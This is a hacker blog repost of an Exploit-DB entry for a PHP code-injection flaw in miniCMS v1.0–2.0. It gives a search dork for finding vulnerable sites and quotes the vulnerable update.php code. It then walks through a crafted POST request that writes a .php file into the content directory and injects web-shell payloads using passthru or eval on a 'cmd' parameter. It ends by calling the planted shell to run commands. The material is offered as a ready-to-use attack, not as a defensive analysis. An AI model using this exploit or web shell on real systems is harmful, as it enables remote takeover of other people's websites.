.
Dr. Cruzz. Diberdayakan oleh Blogger.

Imagination Will Take You Everywhere, Get the Codes and Feel the Soul
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@serv1: ~]#...
./e0f
[+] Post Title :

miniCMS v1.0 : v2.0 php inject code [webapps]


[+] Date : Rabu, 01 Februari 2012
[+] Author : Dr. Cruzz
[+] Link : http://xcruzz.blogspot.com/2012/02/minicms-v10-v20-php-inject-code-webapps.html
[+] Type :
EDB-ID: 18410    CVE: N/A    OSVDB-ID: N/A
Author: Or4nG.M4N


########################################################################
# Title    : miniCMS v1.0 : v2.0 php inject code
# Author   : Or4nG.M4n
# Version  : all version
# GDork    : "This site is managed using MiniCMS©"
# Download : http://sourceforge.net/projects/mini-cms/files/mini-cms/
# Thnks :
# +----------------------------------+
# |   xSs m4n   i-Hmx   h311 c0d3    | sp. Cyb3r-Crystal
# |   SarBoT511 ahwak2000 sa^Dev!L   | sp. ahwak2000
# +----------------------------------+
#                       php code injection and bypass addslashes();
# vuln : update.php shell path /content
# vuln : updatenews.php shell path /content/news
$filename = "content/".$pagename.".txt"; <= .php
        if ($file = fopen($filename, "w"))
        {
            //chmod($filename, 0777);
            if($pagename == "sitemap"){
                $eachline = split("\n", $postTemp["content"]);
                $cleancontent = "";
                foreach($eachline as $el){
                    if(trim($el) != ""){
                        $cleancontent .= trim($el) . "\n";
                    }
                }
                $postTemp["content"] = $cleancontent;
            }
            //$postTemp["content"] = str_replace('"', '\"', $postTemp["content"]);
            if (!get_magic_quotes_gpc()) {
               $postTemp["content"] = addslashes($postTemp["content"]);
            }
            fwrite($file, serialize($postTemp));
            fclose($file);
        }
        else
        {
            echo "Unable to open file for writing, please check permissions on content directory";
        }
    }
    else
    {
        $filename = "content/".$area.".txt"; < = .php
        if ($file = fopen($filename, "w"))
        {
            chmod($filename, 0777);
            //$postTemp["content"] = str_replace('"', '\"', $postTemp["content"]);
            fwrite($file, $postTemp["content"]);
            fclose($file);
        }
 How i can Use this Exploit
 in your Browser FireFox
 use add on LIVE HTTP HEADER
 in target page [ http://localhost/miniCMS-2.0/index.php?page=1 ] ..
 Replay to :
 POST : http://www.cmtsystem.com/mCMS/update.php
 Host: localhost
 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-us,en;q=0.5
 Accept-Encoding: gzip, deflate
 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
 Connection: keep-alive
 Referer: http://localhost/miniCMS-2.0/index.php?page=1
 Cookie: miniCMSdemo=32b5075aba3eb6c5d11129ec114346c2
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 47
 Post this shit : title=1&metadata=1&content=[CODE]&page=thnks-ahwak2000-cyber-crystal.php&area=content
 Add Your code php here : [CODE]
 Now how i can bypass addslashes(); inject <?php passthru($_GET[cmd]);?> or <?php eval($_GET[cmd]);?>
 Don't Forget Referer : http://site/index.php?page=1
 [ ! ] http://site/content/thnks-ahwak2000-cyber-crystal.php?cmd=uname-a
 # Thnks to all Stupid Coder
 # The End

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)